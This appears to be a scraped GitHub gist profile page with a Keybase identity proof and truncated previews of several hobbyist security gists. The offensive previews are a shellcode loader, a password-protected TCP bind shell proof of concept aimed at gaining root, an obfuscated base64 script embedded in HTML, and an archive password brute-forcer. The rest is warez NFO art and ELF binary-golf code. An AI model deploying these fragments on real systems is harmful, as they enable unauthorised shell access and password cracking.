I hereby claim:
- I am yuudev on github.
- I am yuu (https://keybase.io/yuu) on keybase.
- I have a public key ASDQIydjpVlQx_E5naVLU96qDEUSlQvDim0CIZeSl4atnwo
To claim this, I am signing this object:
import binascii | |
import subprocess | |
t = [ "0000","005f","0100","015f","0200", | |
"0201","0300","0400","0500","056a", | |
"0600","0800","0853","0900","0d00", | |
"1000","1100","1400","1800","1900", | |
"1b00","2000","2100","2900","2e73", | |
"2e74","2f62","2f73","31c0","3800", | |
"3801","3b0f","3e00","4000","4831", |
import binascii, subprocess | |
###################################################### | |
# Shinji 3 is a proof of concept password protected # | |
# TCP Bind Shell binary. This one only works on # | |
# localhost, but you could modify to send /bin/sh # | |
# wherev, or use for local priv esc (: # | |
# # | |
# First create a listener $ nc -lvp 4444 # | |
# Then run the loader + binary # | |
# Then type the password 'ayy!' to become root. # |
<html><script>/*. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . */ | |
ci="nVuY3Rpb24gZ";io="O319ZCgpOw==";jk="jMmhwYm1wcE1";/* . */mm="lKC0tXzB4OW"; | |
jw="VuY3Rpb24oX";og="yIF8weDVlNT";/*. . . . . . . . . . . .*/ps="GNITTZMeTly"; | |
cn="1cm4gXzB4Mm";d5="MHhjZWRkKCcw";/*. . . . . . . . . . . */df="MHgyNjQ1NDV"; | |
re="HgyNjQ1NDVbJ";rm="vbihfMHgyODQ";/*. . */k1="NlZGQoJzB4M";rp="zB4MTE0ZDEw"; | |
rv="icpXTtfMHgx";/*. . . . . . . . . . . .*/ij="E0PV8weGVkZ";k5="xfMHhjZWRkK"; | |
k7="NTA3MCkrYXR";/* . . */k8="I3YjAzW18weG";k9="HgyODQ2MjE9";we="ihfMHg5ZTM0"; | |
wh="ZD1mdW5jdGl";/*. . .*/ag="XIgXzB4Y2Vk";sn="NjIxXTtyZXR";ww="8weDExNGQxMD"; | |
k6="Cgpe3ZhciBf";/* . . .*/xz="UzNDYxKXtfM";zz="2MjEsXzB4NT";g9="BjMzhkKXtfM"; | |
tg="1mdW5jdGlvb";/*. . . . . . . . . . . */tk="h2YXIgXzB4M";so="IgXzB4MmZmOG"; |
import subprocess | |
import sys | |
import os | |
archive = sys.argv[2] | |
passfile = sys.argv[1] | |
f = open(passfile, "r") | |
for line in iter(f): | |
trypass = line.strip('\n') |
Super work in progress. These are 80 column wide text effects from old | |
pirate groups, BBS's, and elsewhere. | |
Marked with --- at the beginning marks visually similar or related elements | |
---[ Ratings ] | |
[■■■■■■■■■■] 10/10 | |
░░░░░░░▒▒▒ 7/10 | |
[■■■■■■----] |
This is a collection of NFO templates from various PSP Crack / Warez Groups | |
--- 4Fun | |
▄▀ ▄▄█▓▄ ____________________ __________ ▄▓█▄▄ ▀▄ | |
▐█ ███▀██▓▄ / | \_ _____/ | \ \@TiLK ▄▓██▀███ █▌ | |
▓██▀ ░▐█▓▓ / | || __) | | / | \ ▓▓█▌░ ▀██▓ | |
▀█▓ ░▐█▓▌ / ^ / \ | | / | \ ▐▓█▌░ ▓█▀ | |
▀▀ ▄██▓ \____ |\___ / |______/\____|__ / ▓██▄ ▀▀ | |
▄██▓▀ ▄▀ |__| \/ \/ ▀▄ ▀▓██▄ |
I hereby claim:
To claim this, I am signing this object:
BITS 64 | |
org 0x100000000 ; Where to load this into memory | |
;----------------------+------+-------------+----------+------------------------ | |
; ELF Header struct | OFFS | ELFHDR | PHDR | ASSEMBLY OUTPUT | |
;----------------------+------+-------------+----------+------------------------ | |
db 0x7F, "ELF" ; 0x00 | e_ident | | 7f 45 4c 46 | |
_start: mov al,0x3c ; 0x04 | ei_class | | b0 | |
; 0x05 | ei_data | | 3c |
; 84 byte LINUX_REBOOT_CMD_POWER_OFF Binary Golf | |
BITS 64 | |
org 0x100000000 | |
;---------------------+------+------------+------------------------------------------+-----------------------------+----------+ | |
; CODE LISTING | OFFS | ASSEMBLY | CODE COMMENT | ELF HEADER STRUCT | PHDR | | |
;---------------------+------+------------+------------------------------------------+-----------------------------+----------+ | |
db 0x7F, "ELF" ; 0x0 | 7f454c46 | PROTIP: Can use magic as a constant ;) | ELF Magic | | | |
_start: ;------|------------|------------------------------------------|-----------------------------|----------| | |
mov edx, 0x4321fedc ; 0x04 | badcfe2143 | Moving magic values... | ei_class,ei_data,ei_version | | | |
mov esi, 0x28121969 ; 0x09 | be69191228 | into their respective places | unused | | |
import urllib.request, json, sys, textwrap | |
# Run like | |
# python3 pubsploit.py CVE-2017-0143 | |
def cveSearch(cve): | |
with urllib.request.urlopen('http://cve.circl.lu/api/cve/'+cve) as url: | |
data = json.loads(url.read().decode()) | |
try: | |
if data['cvss']: | |
print("{} | CVSS {}".format(cve,data['cvss'])) |